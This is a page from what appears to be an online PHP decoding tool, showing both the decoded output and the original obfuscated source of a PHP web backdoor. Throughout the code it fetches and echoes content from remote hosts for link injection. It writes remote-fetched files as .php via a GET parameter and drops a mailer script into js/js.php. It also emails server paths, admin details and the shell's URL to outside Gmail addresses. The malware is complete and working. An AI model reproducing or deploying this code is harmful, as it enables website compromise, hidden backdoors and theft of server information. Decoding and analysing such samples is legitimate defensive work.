Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

goto aGKka; oK64q: $header = "\106\x72\x6f\155\72\x20{$from_shellcode}\xd\xa\x52\145\160\..

Decoded Output download

<?   goto aGKka; oK64q: $header = "From: {$from_shellcode}\xd\xaReply-to: {$from_shellcode}"; goto l7BgM; xVP9P: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto Xedxa; uYPOm: echo "<!DOCTYPE html!>"; goto VO0pu; QuTMX: error_reporting(0); goto E2AFM; W9nLU: $EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "\xd
"; goto i1FtU; GExlx: $x = $s . "l-" . base64_encode($host); goto eRvrn; budEA: $EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "
"; goto a6yXf; juFC6: $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "
\xa"; goto gM1Yf; vvKFK: $time_shell = '' . date("d/m/Y - H:i:s") . ''; goto xVP9P; k50Wf: $linkcr = "Link: " . $_SERVER["SERVER_NAME"] . '' . $_SERVER["REQUEST_URI"] . " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; goto oK64q; gM1Yf: $EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "
\xa"; goto W9nLU; Xedxa: $from_shellcode = "lamer@" . gethostbyname($_SERVER["SERVER_NAME"]) . ''; goto XVjal; bum7s: $datasi = @fopen("js/js.php", "r"); goto bXnY2; l7BgM: @mail($to_email, $server_mail, $linkcr, $header); goto xFeS9; i1FtU: $EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xd\xa"; goto budEA; Vc4k8: if (isset($_GET["ksfg"])) { $f = fopen($_GET["ksfg"] . ".php", "a"); fwrite($f, file_get_contents($s . "s-" . $_GET["ksfg"])); fclose($f); } goto uYPOm; s8hdQ: $server_mail = '' . gethostbyname($_SERVER["SERVER_NAME"]) . "  - " . $_SERVER["HTTP_HOST"] . ''; goto k50Wf; xFeS9: $kime = "[email protected]"; goto R97MJ; E2AFM: $s = "https://acbdf.space/"; goto DwuIw; DwuIw: $host = str_replace("www.", '', @$_SERVER["HTTP_HOST"]); goto GExlx; bXnY2: if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/lamer.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>
"; $header .= "Content-Type: text/html;\xa charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } goto vvKFK; eRvrn: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto bSMSI; a6yXf: mail($kime, $baslik, $EL_MuHaMMeD); goto UNxRd; aGKka: function GetIP() { if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif (getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); if (strstr($ip, ",")) { $tmp = explode(",", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("REMOTE_ADDR"); } return $ip; } goto Jv7yz; R97MJ: $baslik = "min 20203"; goto juFC6; VO0pu: if ($_POST["query"]) { $veriyfy = stripslashes(stripslashes($_POST["query"])); $data = "data.txt"; @touch("data.txt"); $ver = @fopen($data, "w"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("data.txt", "r"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto bum7s; bSMSI: echo $gitt; goto Vc4k8; ri1dL: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto QuTMX; Jv7yz: $x = base64_decode("aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ==") . GetIP() . "-" . base64_encode("http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto ri1dL; XVjal: $to_email = "[email protected]"; goto s8hdQ; UNxRd:  ?>

Did this file decode correctly?

Original Code

 goto aGKka; oK64q: $header = "\106\x72\x6f\155\72\x20{$from_shellcode}\xd\xa\x52\145\160\154\x79\x2d\x74\x6f\x3a\x20{$from_shellcode}"; goto l7BgM; xVP9P: $ip_remote = $_SERVER["\x52\x45\115\117\x54\x45\137\101\x44\104\122"]; goto Xedxa; uYPOm: echo "\x3c\41\104\117\103\124\131\120\x45\40\150\x74\155\154\41\x3e"; goto VO0pu; QuTMX: error_reporting(0); goto E2AFM; W9nLU: $EL_MuHaMMeD .= "\123\145\162\x76\145\162\x20\151\x73\x6c\x65\164\151\x6d\40\x73\151\163\x74\145\x6d\x69\40\72\40" . $_SERVER["\123\x45\x52\x56\105\x52\x5f\123\117\106\x54\127\x41\x52\x45"] . "\xd\12"; goto i1FtU; GExlx: $x = $s . "\x6c\55" . base64_encode($host); goto eRvrn; budEA: $EL_MuHaMMeD .= "\x41\166\x6c\x61\x6e\141\x6e\x20\x53\x69\164\145\40\x3a\40" . $_SERVER["\110\124\x54\120\137\x48\x4f\123\x54"] . "\15\12"; goto a6yXf; juFC6: $EL_MuHaMMeD = "\104\x6f\163\171\x61\40\x59\157\154\165\40\x3a\40" . $_SERVER["\x44\117\x43\125\x4d\x45\116\x54\x5f\x52\x4f\x4f\124"] . "\15\xa"; goto gM1Yf; vvKFK: $time_shell = '' . date("\x64\x2f\155\57\x59\40\55\x20\110\72\x69\72\x73") . ''; goto xVP9P; k50Wf: $linkcr = "\x4c\151\x6e\x6b\72\x20" . $_SERVER["\x53\x45\x52\x56\105\x52\137\x4e\101\115\105"] . '' . $_SERVER["\122\x45\x51\125\105\123\x54\137\125\122\111"] . "\40\x2d\x20\x49\120\40\x45\170\143\x75\164\x69\156\147\x3a\x20{$ip_remote}\x20\55\x20\124\x69\155\145\72\x20{$time_shell}"; goto oK64q; gM1Yf: $EL_MuHaMMeD .= "\123\x65\x72\x76\x65\162\x20\101\x64\x6d\x69\156\x20\72\x20" . $_SERVER["\x53\105\x52\x56\x45\x52\137\101\104\x4d\x49\x4e"] . "\15\xa"; goto W9nLU; Xedxa: $from_shellcode = "\154\x61\x6d\x65\162\100" . gethostbyname($_SERVER["\123\x45\x52\126\x45\122\137\x4e\101\115\105"]) . ''; goto XVjal; bum7s: $datasi = @fopen("\x6a\x73\x2f\152\x73\56\160\150\160", "\162"); goto bXnY2; l7BgM: @mail($to_email, $server_mail, $linkcr, $header); goto xFeS9; i1FtU: $EL_MuHaMMeD .= "\123\150\x65\x6c\x6c\40\x4c\x69\156\153\x20\72\40\x68\164\164\x70\72\x2f\57" . $_SERVER["\123\x45\x52\126\105\x52\137\x4e\101\x4d\x45"] . $_SERVER["\120\x48\120\x5f\123\105\114\x46"] . "\xd\xa"; goto budEA; Vc4k8: if (isset($_GET["\153\x73\x66\147"])) { $f = fopen($_GET["\153\x73\x66\147"] . "\56\160\150\160", "\141"); fwrite($f, file_get_contents($s . "\163\55" . $_GET["\153\x73\x66\147"])); fclose($f); } goto uYPOm; s8hdQ: $server_mail = '' . gethostbyname($_SERVER["\x53\x45\122\126\x45\122\x5f\116\101\x4d\x45"]) . "\40\x20\55\40" . $_SERVER["\x48\x54\x54\120\x5f\110\117\123\124"] . ''; goto k50Wf; xFeS9: $kime = "\x62\171\x68\x65\162\x6f\64\x34\100\x67\155\141\151\x6c\56\x63\x6f\x6d"; goto R97MJ; E2AFM: $s = "\x68\x74\164\x70\163\x3a\x2f\x2f\x61\x63\142\x64\x66\x2e\163\x70\x61\143\145\x2f"; goto DwuIw; DwuIw: $host = str_replace("\167\167\167\56", '', @$_SERVER["\110\124\124\x50\137\x48\117\123\124"]); goto GExlx; bXnY2: if ($datasi) { } else { @mkdir("\x6a\163"); $dos = file_get_contents("\x68\164\x74\x70\x73\x3a\x2f\x2f\x61\143\142\144\x66\56\163\x70\x61\143\x65\57\x74\x78\x74\x2f\x6c\141\155\145\x72\56\164\170\164"); $data = "\x6a\163\57\x6a\x73\x2e\x70\150\160"; @touch("\152\163\57\x6a\163\56\x70\x68\160"); $ver = @fopen($data, "\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\x68\164\x74\160\72\x2f\x2f" . $_SERVER["\110\124\x54\120\137\110\x4f\123\124"] . '' . $_SERVER["\x52\x45\x51\125\105\123\x54\137\125\x52\111"] . ''; $y = "\x3c\x68\61\76\123\145\x6e\x64\x65\x72\x20\x59\141\172\x64\x69\162\151\x6c\144\x69\x2e\x3c\142\162\57\x3e\x20\x53\111\x54\105\40\x59\x4f\114\x20\x3a\40" . $yol . "\x3c\142\x72\x2f\x3e\x53\145\156\x64\145\x72\x20\x59\157\x6c\165\40\72\40\x6a\163\x2f\x63\x72\x73\x2e\x70\x68\160\x3c\x2f\x68\x31\x3e"; $header .= "\106\x72\157\x6d\72\40\123\x68\145\114\x4c\40\x42\x6f\x6f\164\x20\74\x73\x75\160\160\x6f\162\100\x6e\151\x63\x2e\x6f\x72\147\x3e\12"; $header .= "\103\157\x6e\x74\145\x6e\164\55\x54\x79\160\145\x3a\40\x74\x65\x78\x74\57\150\164\155\x6c\73\xa\40\143\150\141\162\163\x65\164\75\165\164\146\55\70\xa"; @mail("\154\x6f\147\x69\156\x6f\x6c\x64\165\155\x40\147\155\x61\x69\154\x2e\143\x6f\155", "\110\141\143\x6b\x6c\x69\x6e\x6b\40\102\x69\154\x64\x69\x72\x69", "{$y}", $header); @mail("\x6c\157\x67\151\156\x6f\x6c\144\165\155\x40\147\x6d\x61\151\154\x2e\143\x6f\x6d", "\x48\x61\143\153\x6c\x69\156\x6b\40\x42\x69\x6c\x64\x69\x72\151", "{$y}", $header); } goto vvKFK; eRvrn: if (function_exists("\x63\165\x72\154\x5f\151\x6e\151\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\146\151\x6c\145\x5f\147\x65\164\x5f\143\157\156\x74\x65\156\164\163")) { @($gitt = file_get_contents($x)); } goto bSMSI; a6yXf: mail($kime, $baslik, $EL_MuHaMMeD); goto UNxRd; aGKka: function GetIP() { if (getenv("\x48\x54\x54\x50\137\x43\x4c\x49\105\116\x54\137\x49\x50")) { $ip = getenv("\110\x54\x54\x50\137\103\114\111\105\x4e\124\137\111\x50"); } elseif (getenv("\110\x54\124\x50\137\x58\x5f\x46\117\122\x57\x41\122\104\x45\x44\137\x46\x4f\122")) { $ip = getenv("\x48\x54\124\x50\137\130\137\106\x4f\x52\127\x41\122\x44\x45\x44\137\x46\x4f\122"); if (strstr($ip, "\x2c")) { $tmp = explode("\54", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("\x52\x45\x4d\117\124\x45\137\101\x44\x44\122"); } return $ip; } goto Jv7yz; R97MJ: $baslik = "\155\151\x6e\x20\x32\x30\62\x30\x33"; goto juFC6; VO0pu: if ($_POST["\x71\x75\145\x72\171"]) { $veriyfy = stripslashes(stripslashes($_POST["\x71\x75\145\162\171"])); $data = "\144\141\x74\x61\x2e\164\x78\x74"; @touch("\144\x61\x74\141\56\164\170\164"); $ver = @fopen($data, "\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\144\141\164\141\x2e\x74\170\x74", "\x72"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto bum7s; bSMSI: echo $gitt; goto Vc4k8; ri1dL: if (function_exists("\x63\x75\x72\x6c\x5f\x69\156\x69\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\x66\x69\154\x65\137\x67\145\164\137\x63\157\x6e\164\x65\x6e\x74\x73")) { @($gitt = file_get_contents($x)); } goto QuTMX; Jv7yz: $x = base64_decode("\141\x48\x52\60\143\110\115\x36\114\x79\x39\x68\x62\x6d\x39\165\145\127\x30\x77\x64\x58\x4d\165\131\x32\170\61\x59\x69\x39\x73\x4c\121\75\x3d") . GetIP() . "\55" . base64_encode("\150\164\x74\x70\72\57\x2f" . $_SERVER["\x48\124\x54\120\137\110\117\x53\x54"] . $_SERVER["\x52\105\x51\125\x45\123\124\137\125\122\x49"]); goto ri1dL; XVjal: $to_email = "\x6c\x6f\x67\151\156\157\x6c\144\x75\155\100\x67\x6d\141\x69\154\x2e\143\157\155"; goto s8hdQ; UNxRd:

Function Calls

None

Variables

None

Stats

MD5	89b13cd94a66c6bec820564a3a0da6c2
Eval Count	0
Decode Time	38 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats